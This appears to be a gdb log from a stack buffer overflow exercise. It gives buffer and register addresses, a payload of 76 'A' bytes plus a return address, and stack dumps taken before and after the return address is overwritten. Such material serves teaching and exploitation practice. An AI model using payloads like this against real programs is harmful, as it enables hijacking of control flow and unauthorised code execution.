Registers address: ebp 0xbffff4a8 0xbffff4a8 esp 0xbffff450 0xbffff450 ebp-esp=0x58 Buffer address: 0xbffff460 PAYLOAD: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x1C\x85\x04\x08 BEFORE PAYLOAD INJECT: (gdb) x/40x $esp 0xbffff450: 0x080486af 0x00000001 0x00000000 0x00000001 0xbffff460:*0xb7fff908 0xbffff496 0xbffff4a0 0xb7ee2290[buffer beginning] 0xbffff470: 0xbffff496 0xb7e8f5f5 0xbffff497 0x00000001 0xbffff480: 0x00000000 0xbffff520 0xb7fbfce0 0x08048380 0xbffff490: 0xb7ff0590 0x080498b8 0xbffff4c8* 0x0804864b[buffer end] 0xbffff4a0: 0x00000001 0xbffff574 0xbffff4c8 [0x080485bc][Return Address] 0xbffff4b0: 0xb7e8f7f5 0xb7ff0590 0x0804860b 0xb7fbeff4 0xbffff4c0: 0x08048600 0x00000000 0xbffff548 0xb7e76e46 0xbffff4d0: 0x00000001 0xbffff574 0xbffff57c 0xb7fe0860 0xbffff4e0: 0xb7ff6821 0xffffffff 0xb7ffeff4 0x080482d9 AFTER PAYLOAD INJECT: (gdb) x/60x 0xbffff450 0xbffff450: 0xbffff460 0x00000001 0x00000000 0x00000001 0xbffff460: *0x41414141 0x41414141 0x41414141 0x41414141[buffer beginning] 0xbffff470: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff480: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff490: 0x41414141 0x41414141 0x41414141* 0x41414141[buffer end] 0xbffff4a0: 0x41414141 0x41414141 0x41414141 [0x0804851c][Return Address] 0xbffff4b0: 0xb7e8f700 0xb7ff0590 0x0804860b 0xb7fbeff4 0xbffff4c0: 0x08048600 0x00000000 0xbffff548 0xb7e76e46 0xbffff4d0: 0x00000001 0xbffff574 0xbffff57c 0xb7fe0860 0xbffff4e0: 0xb7ff6821 0xffffffff 0xb7ffeff4 0x080482d9